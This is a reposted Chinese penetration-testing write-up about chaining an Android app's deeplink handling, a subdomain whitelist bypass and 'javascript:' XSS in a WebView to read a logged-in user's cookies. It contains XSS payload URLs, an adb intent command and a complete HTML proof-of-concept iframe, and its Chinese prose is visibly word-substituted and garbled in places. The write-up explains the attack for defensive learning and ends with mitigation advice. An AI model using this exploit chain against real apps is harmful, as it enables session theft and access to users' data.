加入收藏 | 设为首页 | 会员中心 | 我要投稿 湖南网 (https://www.hunanwang.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 教程 > 正文

APP裂痕操作组合拳——应用克隆案例说明

发布时间:2019-06-03 23:19:23 所属栏目:教程 来源:牛冠杰
导读:一、媒介 在事变中碰着了一次Android应用克隆裂痕的案例,因为进攻进程很是风趣,综合操作了多此中低风险裂痕,发生了化溃烂为神奇的进攻结果。在此分享给各人,以扩展渗出测试思绪。 二、裂痕详情 1. 裂痕先容 进攻者可通过散布恶意结构的HTML文件,来窃

在root装备大将APP目次导出到PC上,行使相同grep器材搜刮要害字 *.xxx.com、url=、path=、back=、return=,发明多个存在恣意URL跳转裂痕或JS代码执行裂痕的URL。

  • https://m.stock.xxx.com/static/router.html?desturl=https://www.baidu.com,恣意URL跳转裂痕和XSS跨站剧本进攻,不能读文件。
  • https://test.xxx.com/ibp/outlets/index.html?returnUrl=javascript:alert(document.cookie) ,必要点击返回按钮触发跳转,恣意URL跳转和XSS跨站剧本进攻,不能读文件。
  • https://static.xxx.com/pages/addRouter.html?url=https://www.baidu.com ,必要点击返回按钮触发跳转,恣意URL跳转和XSS跨站剧本进攻,不能读文件。
  • https://static.xxx.com/ pages /entrance.html?discontinueUrl=javascript:alert(document.cookie) ,必要点击确定按钮,无法恣意URL跳转,不能读文件,可是可以执行Javascript;。
  • https://static.xxx.com/ pages/accllation/transit.html?returnUrl=javascript:alert(document.cookie) ,无法恣意URL跳转,不能读文件,可是可以执行Javascript。

Payload示例:adb shell am start -a "android.intent.action.VIEW" -d "mydeeplink://?mydeeplink={url:'https://static.xxx.com/pages/accllation/transit.html?returnUrl=https://www.baidu.com'}" ,可通过呼吁行启动Android假造机中的APP,并会见百度页面,绕过白名单限定,如图3.3所示。

子域名URL跳转百度乐成

图3.3  子域名URL跳转百度乐成

4. 结构恶意HTML获取Cookie

团结以上说明进程,通过结构恶意HTML文件,团结Deeplink、白名单绕过和JS代码执行裂痕,获取用户Cookie,行使Cookie获取用户敏感信息。

结构综合操作POC:

  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
  2. <html xmlns="http://www.w3.org/1999/xhtml"> 
  3. <head> 
  4. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
  5. <title></title> 
  6. </head> 
  7. <body> 
  8. <br/><br/> 
  9. <iframe name="child" width="300" height="300" src="mydeeplink://?mydeeplink={url:' https://static.xxx.com/pages/accllation/transit.html?returnUrl=javascript:alert(document.cookie)'}" style="padding:0px;" ></iframe> 
  10. </body> 
  11. </html> 

在Android模仿器中打开APP,登录账号,然后按Home键返回主界面。

在赏识器中会见结构的恶意HTML链接 http://192.168.96.1/test.html,自动叫醒APP,待页面加载完毕后,乐成弹出Cookie,如图3.4所示。

获取用户cookie

图3.4   获取用户cookie

虽然也可以不表现弹窗,直接把Cookie发送到本身的处事器上,以此窃取的Cookie向处事端提倡哀求,就可以得到该用户的数据了。

四、总结

简朴梳理一下整个裂痕操作流程,如图4.1所示。

裂痕操作流程

图4.1  裂痕操作流程

从图4.1可见,Intent Scheme、WebView和子域名这三处中恣意一处做了有用过滤的话,都可以阻止这次裂痕进攻。其它,在搜刮的裂痕URL功效中可以发明,该APP的防护法子是较量完美的,阻止了file协议的文件读取目次,并且部门子域名页面所加载的JS也行使正则表达式做了恣意URL跳转的防护,但照旧忽略了对伪协议“javascript:”的防御(见图4.2)。

裂痕触发点

图4.2  裂痕触发点

跟着营业的拓展,以及收集的不绝扩展和日趋伟大,对内、对外处事不绝增多,为企业内部拟定一个安详编码类型就显得尤为重要。

总之,收集安详路途漫漫,如故必要我们不绝试探,以研究出更利于收集安详的软件。

【本文为51CTO专栏作者“安详加”原创稿件,转载请接洽原作者】

戳这里,看该作者更多好文

(编辑:湖南网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
相关内容
    推荐文章
    站长推荐
    热点阅读

      【免责声明】本站内容转载自互联网,其发布内容言论不代表本站观点,如果其链接、内容的侵犯您的权益,烦请提交相关链接至邮箱bqsm@foxmail.com我们将及时予以处理。

      建议您使用1920×1080分辨率、谷歌浏览器Google Chrome、Microsoft Edge以获得本站的最佳浏览效果

      Copygight © 2008-2022 https://www.hunanwang.cn/ All Rights Reserved. 湖南网